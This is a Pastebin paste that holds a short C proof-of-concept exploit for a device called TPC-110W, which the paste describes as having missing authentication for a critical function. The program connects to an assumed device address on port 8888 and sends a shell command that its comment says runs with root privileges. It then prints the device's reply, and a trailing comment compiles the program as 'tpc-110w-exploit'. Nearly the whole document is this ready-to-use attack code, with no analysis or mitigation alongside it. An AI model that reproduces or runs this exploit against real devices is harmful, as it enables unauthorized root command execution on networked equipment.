Advertisement
FlyFar

TPC-110W - Missing Authentication for Critical Function

Mar 7th, 2024
664
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.18 KB | Cybersecurity | 0 0
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <sys/socket.h>
  5. #include <arpa/inet.h>
  6. #include <unistd.h>
  7.  
  8. int main(int argc, char *argv[]) {
  9.     int sock;
  10.     struct sockaddr_in serv_addr;
  11.     char command[512];
  12.  
  13.     sock = socket(AF_INET, SOCK_STREAM, 0);
  14.     if (sock < 0) {
  15.         perror("socket");
  16.         exit(1);
  17.     }
  18.  
  19.     memset(&serv_addr, '0', sizeof(serv_addr));
  20.     serv_addr.sin_family = AF_INET;
  21.     serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888
  22.     if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10
  23.         perror("inet_pton");
  24.         exit(1);
  25.     }
  26.  
  27.     if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
  28.         perror("connect");
  29.         exit(1);
  30.     }
  31.  
  32.     // Run command with root privileges
  33.     snprintf(command, sizeof(command), "id\n"); // Check user id
  34.     write(sock, command, strlen(command));
  35.  
  36.     memset(command, '0', sizeof(command));
  37.     read(sock, command, sizeof(command));
  38.     printf("%s\n", command);
  39.  
  40.     close(sock);
  41.     return 0;
  42. }
  43.  
  44. //gcc -o tpc-110w-exploit tpc-110w-exp
  45.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement